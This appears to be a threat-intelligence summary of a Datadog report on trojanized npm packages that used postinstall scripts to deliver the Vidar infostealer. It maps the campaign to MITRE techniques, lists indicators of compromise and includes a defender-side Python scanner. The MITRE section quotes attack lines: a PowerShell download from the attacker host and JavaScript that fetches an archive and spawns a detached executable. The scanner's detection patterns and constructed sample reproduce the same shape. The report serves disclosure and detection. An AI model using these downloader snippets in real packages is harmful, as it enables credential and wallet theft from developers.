MUT-4831: Trojanized npm packages deliver Vidar infostealer malware

Datadog Security Research discovered 17 malicious npm packages (23 releases) that used postinstall scripts to download and execute a Vidar infostealer payload on Windows systems, attributed to threat cluster MUT-4831. The campaign abused freshly created npm accounts to publish SDK-like packages masquerading as benign libraries and used download URLs such as upload.bullethost.cloud to fetch encrypted ZIP archives containing bridle.exe. #Vidar #MUT-4831

Key points

  • Datadog detected 17 npm packages (23 releases) delivering downloader malware via postinstall scripts that target Windows systems.
  • The malicious packages masqueraded as legitimate SDKs (Telegram bot helpers, icon libs, forks of Cursor/React) to increase trust and installs.
  • GuardDog flagged indicators including suspicious URLs, silent execution (spawn detached stdio ignore), and npm postinstall execution of src/dependencies.js.
  • The postinstall scripts downloaded encrypted ZIP archives from domains like upload.bullethost.cloud, extracted them with a hardcoded password, and executed a PE named bridle.exe.
  • bridle.exe was identified by SHA-256 as a Vidar infostealer variant (Vidar v2 compiled in Go) that collects credentials, wallets, cookies and exfiltrates via social-media-based C2 channels.
  • The campaign was attributed to threat activity cluster MUT-4831; publisher accounts (aartje, saliii229911) were recently created and subsequently banned with packages removed.
  • Packages remained live for ~two weeks, had at least 2,240 downloads (react-icon-pkg peaked at 503), and Datadog published the malicious package dataset for research and SCA queries for detection.

MITRE Techniques

  • [T1059] Command and Scripting Interpreter – postinstall scripts and embedded PowerShell were used to download and run code during package installation ("The package.json has a script automatically running when the package is installed … 'postinstall': 'node src/dependencies.js'"; PowerShell: "iwr 'https://upload.bullethost[.]cloud/download/68f5503834645ddd64ba3e17' -OutFile $env:TEMP\bLtjqzUn.zip").
  • [T1105] Ingress Tool Transfer – the postinstall scripts download encrypted ZIP archives from remote URLs to the victim's TEMP directory ("const downloadUrl = 'https://upload.bullethost[.]cloud/download/68f55d7834645ddd64ba3e3e'; … await downloadFile(downloadUrl, zipPath);").
  • [T1047] Windows Management Instrumentation and Execution – executed a downloaded PE binary (.exe) from the extracted archive using a spawned detached process ("var child = spawn(exePath, [], { detached: true, stdio: 'ignore' });" and "await executeExe(extractPath);").
  • [T1555] Credentials from Web Browsers (data from local sources) – Vidar infostealer collects browser credentials and cookies as part of its data theft capabilities ("Vidar collects sensitive data, including browser credentials, cookies, cryptocurrency wallets, and system files").
  • [T1078] Valid Accounts (C2 discovery via public accounts) – the malware uses hardcoded Telegram and Steam profiles to discover active C2 infrastructure ("the executable thus first calls home to the Telegram and Steam profiles to discover which second-order C2 infrastructure is currently active").
  • [T1027] Obfuscated Files or Information – use of encrypted ZIP archives with hardcoded passwords to hide the payload ("Download an encrypted ZIP archive … Decrypt and extract the archive, using the same hardcoded string for the ZIP file name and decompression password").
  • [T1486] Data Encrypted for Impact / Data Destruction (cleanup) – Vidar deletes traces after exfiltration to hinder detection and response ("Upon successful data exfiltration, the malware deletes all traces of itself from the victim system").
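As an added defender-side example (not code from the Datadog write-up, GuardDog, or the malicious packages), the scanner below applies the indicators listed above to an npm package: it finds install-time hooks in package.json, follows a `node <file>` hook to the script it runs, and matches that script against source-level rules modelled on the described behaviour (remote download URL, detached `stdio: 'ignore'` spawn, password-protected archive, TEMP drop, PowerShell `iwr … -OutFile`, `.exe` reference). The heuristics and the sample package it scans are constructed for illustration; the sample only mirrors the described shape of src/dependencies.js and is not runnable code.

```python
import json
import re
from typing import Dict, List, Tuple

# Install-time hooks npm runs automatically; this campaign abused postinstall.
INSTALL_HOOKS = ("preinstall", "install", "postinstall")

# Source-level indicators modelled on the behaviour described for src/dependencies.js.
SOURCE_RULES: List[Tuple[str, "re.Pattern[str]"]] = [
    ("remote download URL", re.compile(r"https?://[^\s'\"`]+")),
    ("silent detached child process",
     re.compile(r"spawn\([^)]*detached:\s*true[^)]*stdio:\s*['\"]ignore['\"]")),
    ("password-protected archive", re.compile(r"password\s*:", re.I)),
    ("embedded PowerShell downloader",
     re.compile(r"\b(?:iwr|Invoke-WebRequest)\b[^\n]*-OutFile", re.I)),
    ("writes under TEMP", re.compile(r"\$env:TEMP|\btmpdir\(\)")),
    ("references a Windows PE", re.compile(r"\.exe\b")),
]

def scan_package(package_json: str, files: Dict[str, str]) -> List[str]:
    """package_json: raw package.json text; files: relative path -> source text."""
    findings: List[str] = []
    for hook, cmd in json.loads(package_json).get("scripts", {}).items():
        if hook not in INSTALL_HOOKS:
            continue
        findings.append(f"{hook} hook: {cmd}")
        # Follow 'node <file>' to the script the hook actually executes.
        m = re.search(r"\bnode\s+(\S+)", cmd)
        target = m.group(1) if m else None
        for label, pattern in SOURCE_RULES:
            if target in files and pattern.search(files[target]):
                findings.append(f"{target}: {label}")
    return findings

def is_suspicious(findings: List[str]) -> bool:
    """Flag when an install hook exists and at least two source indicators fire."""
    has_hook = any(" hook: " in f for f in findings)
    return has_hook and sum(" hook: " not in f for f in findings) >= 2

# Constructed sample mirroring the described trojanized package; the helpers it
# calls are deliberately undefined, this is scanner input only, not runnable code.
SAMPLE_PACKAGE_JSON = json.dumps({"name": "react-icon-pkg", "version": "1.0.0",
                                  "scripts": {"postinstall": "node src/dependencies.js"}})
SAMPLE_FILES = {"src/dependencies.js": """
const { spawn } = require('child_process');
const downloadUrl = 'https://upload.bullethost[.]cloud/download/68f55d7834645ddd64ba3e3e';
const zipPath = require('path').join(require('os').tmpdir(), 'bLtjqzUn.zip');
await downloadFile(downloadUrl, zipPath);
await extract(zipPath, { password: 'bLtjqzUn' });
var child = spawn(extractPath + '/bridle.exe', [], { detached: true, stdio: 'ignore' });
"""}
```

The same scan can be run over every package in node_modules after `npm install --ignore-scripts`, which installs the files without executing any hook, so the scripts can be inspected before they ever run.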

Indicators of Compromise

  • [Domain] download hosting and C2 – upload.bullethost.cloud/download/68f55d7834645ddd64ba3e3e, upload.bullethost.cloud/download/68f5503834645ddd64ba3e17
  • [File name] archived payload – bLtjqzUn.zip (contains bridle.exe)
  • [File name / binary] malware executable – bridle.exe (Vidar variant, single PE across samples)
  • [Domains] Vidar C2 infrastructure examples – gra.khabeir[.]com, a.t.rizbegadget[.]shop (and multiple other C2 domains listed: cvt.technicalprorj[.]xyz, ftp.nadimgadget[.]shop, etc.)
  • [Profiles / URLs] social-media C2 discovery – https://telegram[.]me/s/sre22qe (Telegram profile), https://steamcommunity[.]com/profiles/76561198777118079 (Steam profile)
  • [Account names] npm publishers tied to the campaign – aartje, saliii229911 (accounts that published the malicious packages)

Read more: https://securitylabs.datadoghq.com/articles/mut-4831-trojanized-npm-packages-vidar/